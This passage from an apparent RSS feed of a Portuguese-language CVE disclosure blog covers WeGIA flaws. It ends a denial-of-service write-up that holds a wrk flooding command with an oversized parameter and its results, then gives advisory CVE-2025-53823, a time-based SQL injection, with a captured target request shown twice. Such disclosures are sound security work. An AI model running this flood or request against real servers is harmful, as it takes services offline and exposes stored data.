&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  wrk -t12 -c400 -d60s &amp;amp;#34;https://comfirewall.wegia.org:8000/WeGIA?fid=111251&amp;amp;amp;file_url=111256$(python3 -c &amp;amp;#39;print(&amp;amp;#34;&amp;amp;amp;param=&amp;amp;#34; &#43; &amp;amp;#34;X&amp;amp;#34;*8000)&amp;amp;#39;)&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;video width=&amp;#34;100%&amp;#34; height=&amp;#34;100%&amp;#34; controls&amp;gt;
  &amp;lt;source src=&amp;#34;404374779-e8006b99-a94b-4407-a3d5-64fbeaf985f5.mp4&amp;#34; type=&amp;#34;video/mp4&amp;#34;&amp;gt;
&amp;lt;/video&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Resultados de testes atualizados com &amp;lt;code&amp;gt;wrk&amp;lt;/code&amp;gt;:&amp;lt;/b&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Solicitações processadas: 20.799 solicitações em 1 minuto, com 330,90 MB lidos.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Latência média:&amp;lt;/b&amp;gt; 280,91 ms, com pico de 2 segundos.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Erros:&amp;lt;/b&amp;gt; 98 erros de leitura e 591 tempos limite ocorreram.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Taxa de solicitação: 346,07 solicitações/seg.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Transferência de dados:&amp;lt;/b&amp;gt; 5,51 MB/seg.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta é uma vulnerabilidade de Negação de Serviço. Qualquer usuário não autenticado com acesso a ferramentas como o OWASP ZAP pode explorar esse problema e fazer com que o servidor pare de responder. Isso afeta a disponibilidade do aplicativo e pode interromper as operações comerciais. A falta de limitação de taxa e restrições de rastreamento recursivo aumenta o risco e torna a vulnerabilidade explorável por invasores pouco qualificados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela0x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53823</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53823/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53823/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53823-vulnerabilidade-de-injeção-de-sql-baseada-em-tempo-no-parâmetro-id_socio-do-endpoint-processa_deletar_sociophp&amp;#34;&amp;gt;CVE-2025-53823: Vulnerabilidade de injeção de SQL (baseada em tempo) no parâmetro &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;processa_deletar_socio.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção de SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/processa_deletar_socio.php&amp;lt;/code&amp;gt;. Esta vulnerabilidade permite a execução de comandos SQL arbitrários, o que pode comprometer a confidencialidade, a integridade e a disponibilidade dos dados armazenados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 24
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua: &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: /
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: https://sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=1, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;id_socio=1&amp;amp;amp;pessoa=fisica
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53823/image.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;732&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;260&amp;#34;
		data-flex-basis=&amp;#34;624px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53823-vulnerabilidade-de-injeção-de-sql-baseada-em-tempo-no-parâmetro-id_socio-do-endpoint-processa_deletar_sociophp&amp;#34;&amp;gt;CVE-2025-53823: Vulnerabilidade de injeção de SQL (baseada em tempo) no parâmetro &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;processa_deletar_socio.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção de SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/processa_deletar_socio.php&amp;lt;/code&amp;gt;. Esta vulnerabilidade permite a execução de comandos SQL arbitrários, o que pode comprometer a confidencialidade, a integridade e a disponibilidade dos dados armazenados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 24
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua: &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: /
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: https://sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=1, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
